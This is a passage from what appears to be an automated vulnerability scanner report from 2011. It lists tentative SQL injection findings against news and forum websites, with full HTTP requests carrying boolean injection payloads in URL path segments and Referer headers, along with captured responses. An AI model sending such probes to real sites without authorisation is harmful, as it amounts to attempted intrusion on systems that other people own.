<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
</head>
<body class="MainBG" >
<form name="aspnetForm" method="post" action="Templates/FreeTemplate.aspx?Rq=6)O7AGuNR-5Hs3tQp8_-6aO0dG3Wd-4Z(w(lW3v-7G(ayK(!5-5YNMMejO2-7p0%3dPmm()-4DDj
...[SNIP]...

Request 2

GET /news'%20and%201%3d2--%20/middleeast/2011/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2 (redirected)

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:51:59 GMT
Date: Sun, 30 Jan 2011 14:51:59 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=60
Content-Length: 174785
Content-Type: text/html
Age: 16
X-Cache: HIT from 12.120.11.62
Via: 1.1 12.120.11.62:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   AJE - Al Jazeera English
</title><link id="ctl00_lnkRss" rel="alternate" type="application/rss+xml" title="Aljazeer English" href="/Services/Rss/?PostingId=2007731105943979989" /><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:44:41 GMT" />
<link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" />
<link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js?i=1" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/StoryFader.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript">//isItMobile();</script>
</head>
<body class="MainBG">
<form id='Default' name='Default' method='post'>



<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwLwz6SaDgLlsYGEDAKx8M2kDQ==" />
<div id="dvSummaryExt">
<div id="dvSummaryMain">
<div id="dvBanners">
<div id="dvMainAd"></div>
<div id="dvAdSpacer"></div>
<div id="dvSmallAd"></div>
</div>
<div id="dvPageHeaderRow">

...[SNIP]...

1.10. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://english.aljazeera.net
Path:   /news/middleeast/2011/01/201113085252994161.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/middleeast'%20and%201%3d1--%20/2011/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:53:23 GMT
Expires: Sun, 30 Jan 2011 14:53:23 GMT
Date: Sun, 30 Jan 2011 14:53:23 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4mzuhv45dkuuyh45qjoteg55; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 64156
X-Cache: MISS from 12.120.11.62
Via: 1.1 12.120.11.62:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Egypt shuts down Al Jazeera bureau - Middle East - Al Jazeera English
</title><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta id="ctl00_meta1" name="description" content="Network's licences cancelled and accreditation of staff in Cairo withdrawn by order of information minister." /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:53:09 GMT" /><link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" /><link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/AddthisSettings.js" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
</head>
<body class="MainBG" >
<form name="aspnetForm" method="post" action="Templates/FreeTemplate.aspx?Rq=6)O7AGuNR-5Hs3tQp8_-6aO0dG3Wd-4Z(w(lW3v-7G(ayK(!5-5YNMMejO2-7p0%3dPmm()-4DDj
...[SNIP]...

Request 2

GET /news/middleeast'%20and%201%3d2--%20/2011/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2 (redirected)

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:53:14 GMT
Date: Sun, 30 Jan 2011 14:53:14 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=60
Content-Length: 174785
Content-Type: text/html
Age: 9
X-Cache: HIT from 12.120.11.61
Via: 1.1 12.120.11.61:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   AJE - Al Jazeera English
</title><link id="ctl00_lnkRss" rel="alternate" type="application/rss+xml" title="Aljazeer English" href="/Services/Rss/?PostingId=2007731105943979989" /><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:44:41 GMT" />
<link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" />
<link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js?i=1" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/StoryFader.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript">//isItMobile();</script>
</head>
<body class="MainBG">
<form id='Default' name='Default' method='post'>



<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwLwz6SaDgLlsYGEDAKx8M2kDQ==" />
<div id="dvSummaryExt">
<div id="dvSummaryMain">
<div id="dvBanners">
<div id="dvMainAd"></div>
<div id="dvAdSpacer"></div>
<div id="dvSmallAd"></div>
</div>
<div id="dvPageHeaderRow">

...[SNIP]...

1.11. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://english.aljazeera.net
Path:   /news/middleeast/2011/01/201113085252994161.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/middleeast/2011'%20and%201%3d1--%20/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:54:23 GMT
Expires: Sun, 30 Jan 2011 14:54:23 GMT
Date: Sun, 30 Jan 2011 14:58:06 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zm2lsi45ohofqt55b5zofc25; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 64156
X-Cache: MISS from 12.120.11.61
Via: 1.1 12.120.11.61:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Egypt shuts down Al Jazeera bureau - Middle East - Al Jazeera English
</title><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta id="ctl00_meta1" name="description" content="Network's licences cancelled and accreditation of staff in Cairo withdrawn by order of information minister." /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:58:01 GMT" /><link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" /><link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/AddthisSettings.js" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
</head>
<body class="MainBG" >
<form name="aspnetForm" method="post" action="Templates/FreeTemplate.aspx?Rq=6)O7AGuNR-5Hs3tQp8_-6aO0dG3Wd-4Z(w(lW3v-7G(ayK(!5-5YNMMejO2-7p0%3dPmm()-4DDj
...[SNIP]...

Request 2

GET /news/middleeast/2011'%20and%201%3d2--%20/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2 (redirected)

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:54:13 GMT
Date: Sun, 30 Jan 2011 14:57:56 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=60
Content-Length: 174785
Content-Type: text/html
Age: 11
X-Cache: HIT from 12.120.11.63
Via: 1.1 12.120.11.63:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   AJE - Al Jazeera English
</title><link id="ctl00_lnkRss" rel="alternate" type="application/rss+xml" title="Aljazeer English" href="/Services/Rss/?PostingId=2007731105943979989" /><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:44:41 GMT" />
<link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" />
<link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js?i=1" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/StoryFader.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript">//isItMobile();</script>
</head>
<body class="MainBG">
<form id='Default' name='Default' method='post'>



<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwLwz6SaDgLlsYGEDAKx8M2kDQ==" />
<div id="dvSummaryExt">
<div id="dvSummaryMain">
<div id="dvBanners">
<div id="dvMainAd"></div>
<div id="dvAdSpacer"></div>
<div id="dvSmallAd"></div>
</div>
<div id="dvPageHeaderRow">

...[SNIP]...

1.12. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://english.aljazeera.net
Path:   /news/middleeast/2011/01/201113085252994161.html

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/middleeast/2011/01'%20and%201%3d1--%20/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:55:14 GMT
Expires: Sun, 30 Jan 2011 14:55:14 GMT
Date: Sun, 30 Jan 2011 14:58:57 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xpdobtjno12jtunglmaon455; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 64156
X-Cache: MISS from 12.120.11.61
Via: 1.1 12.120.11.61:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Egypt shuts down Al Jazeera bureau - Middle East - Al Jazeera English
</title><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta id="ctl00_meta1" name="description" content="Network's licences cancelled and accreditation of staff in Cairo withdrawn by order of information minister." /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:58:50 GMT" /><link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" /><link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/AddthisSettings.js" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
</head>
<body class="MainBG" >
<form name="aspnetForm" method="post" action="Templates/FreeTemplate.aspx?Rq=6)O7AGuNR-5Hs3tQp8_-6aO0dG3Wd-4Z(w(lW3v-7G(ayK(!5-5YNMMejO2-7p0%3dPmm()-4DDj
...[SNIP]...

Request 2

GET /news/middleeast/2011/01'%20and%201%3d2--%20/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2 (redirected)

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:55:13 GMT
Date: Sun, 30 Jan 2011 14:58:56 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=60
Content-Length: 174785
Content-Type: text/html
Age: 2
X-Cache: HIT from 12.120.11.63
Via: 1.1 12.120.11.63:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   AJE - Al Jazeera English
</title><link id="ctl00_lnkRss" rel="alternate" type="application/rss+xml" title="Aljazeer English" href="/Services/Rss/?PostingId=2007731105943979989" /><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:44:41 GMT" />
<link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" />
<link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js?i=1" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/StoryFader.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript">//isItMobile();</script>
</head>
<body class="MainBG">
<form id='Default' name='Default' method='post'>



<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwLwz6SaDgLlsYGEDAKx8M2kDQ==" />
<div id="dvSummaryExt">
<div id="dvSummaryMain">
<div id="dvBanners">
<div id="dvMainAd"></div>
<div id="dvAdSpacer"></div>
<div id="dvSmallAd"></div>
</div>
<div id="dvPageHeaderRow">

...[SNIP]...

1.13. http://forums.silverlight.net/forums/topicsactive.aspx [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://forums.silverlight.net
Path:   /forums/topicsactive.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /forums/topicsactive.aspx?forumid=-1 HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73344
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 10:39:49 GMT; expires=Mon, 30-Jan-2012 15:39:49 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 15:59:49 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:39:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Of
...[SNIP]...
<a href="/members/abeaulieu.aspx" title="abeaulieu" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="abeaulieu" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/abeaulieu.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/clintong.aspx" title="clintong" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="clintong" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/clintong.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/j2inet.aspx" title="j2inet" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="j2inet" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/j2inet.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/swo.aspx" title="swo" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="swo" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/swo.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>

...[SNIP]...

Request 2

GET /forums/topicsactive.aspx?forumid=-1 HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73401
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 10:39:50 GMT; expires=Mon, 30-Jan-2012 15:39:50 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 15:59:50 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:39:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Of
...[SNIP]...
<a href="/members/Gaz3ll.aspx" title="Gaz3ll" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="Gaz3ll" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/Gaz3ll.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/j2inet.aspx" title="j2inet" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="j2inet" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/j2inet.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/queequac.aspx" title="queequac" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="queequac" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/queequac.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/atti.aspx" title="atti" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="atti" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i3.silverlight.net/avatar/atti.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>

...[SNIP]...

1.14. http://forums.silverlight.net/user/viewonline.aspx [ASP.NET_SessionId cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.silverlight.net
Path:   /user/viewonline.aspx

Issue detail

